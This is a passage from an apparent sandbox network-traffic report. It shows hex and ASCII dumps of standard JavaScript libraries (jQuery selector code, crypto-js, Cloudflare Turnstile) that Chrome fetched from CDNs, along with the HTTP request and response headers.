                                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.1649725104.17.24.144435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:06 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                          Host: cdnjs.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: cross-site
                                                                                          Sec-Fetch-Mode: no-cors
                                                                                          Sec-Fetch-Dest: script
                                                                                          Referer: https://1z.ensfulthal.com/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:07 UTC959INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:06 GMT
                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Cache-Control: public, max-age=30672000
                                                                                          ETag: W/"61182885-40eb"
                                                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                          Timing-Allow-Origin: *
                                                                                          X-Content-Type-Options: nosniff
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 63922
                                                                                          Expires: Mon, 17 Nov 2025 14:15:06 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s8pI0jQVq%2BjnfbApZVT%2Bhij3IBHAIZp3a2S6F3Je9T9hYQhTSQbWSEP8IPaMPThu3yVZntOJEhpukT5%2FWd1LSMqi22o1Npb6cYA7HzoAkflkw3pX5FYcGsLc%2FW8K5ihsUSseeKQm"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92ba7c0a088c65-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:07 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                          Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                          2024-11-27 14:15:07 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                                                          Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                                                          2024-11-27 14:15:07 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                                                          Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                                                          2024-11-27 14:15:07 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                                                          Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                                                          2024-11-27 14:15:07 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                                                          Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                                                          2024-11-27 14:15:07 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                                                          Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                                                          2024-11-27 14:15:07 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                                                          Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                                                          2024-11-27 14:15:07 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                                                          Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                                                          2024-11-27 14:15:07 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                                                          Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                                                          2024-11-27 14:15:07 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                                                          Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.1649727104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:08 UTC648OUTGET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: cross-site
                                                                                          Sec-Fetch-Mode: no-cors
                                                                                          Sec-Fetch-Dest: script
                                                                                          Referer: https://1z.ensfulthal.com/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:08 UTC471INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:08 GMT
                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                          Content-Length: 47695
                                                                                          Connection: close
                                                                                          accept-ranges: bytes
                                                                                          last-modified: Thu, 21 Nov 2024 17:58:42 GMT
                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                          access-control-allow-origin: *
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92ba8618d84282-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:08 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                          2024-11-27 14:15:08 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                          Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                          2024-11-27 14:15:08 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
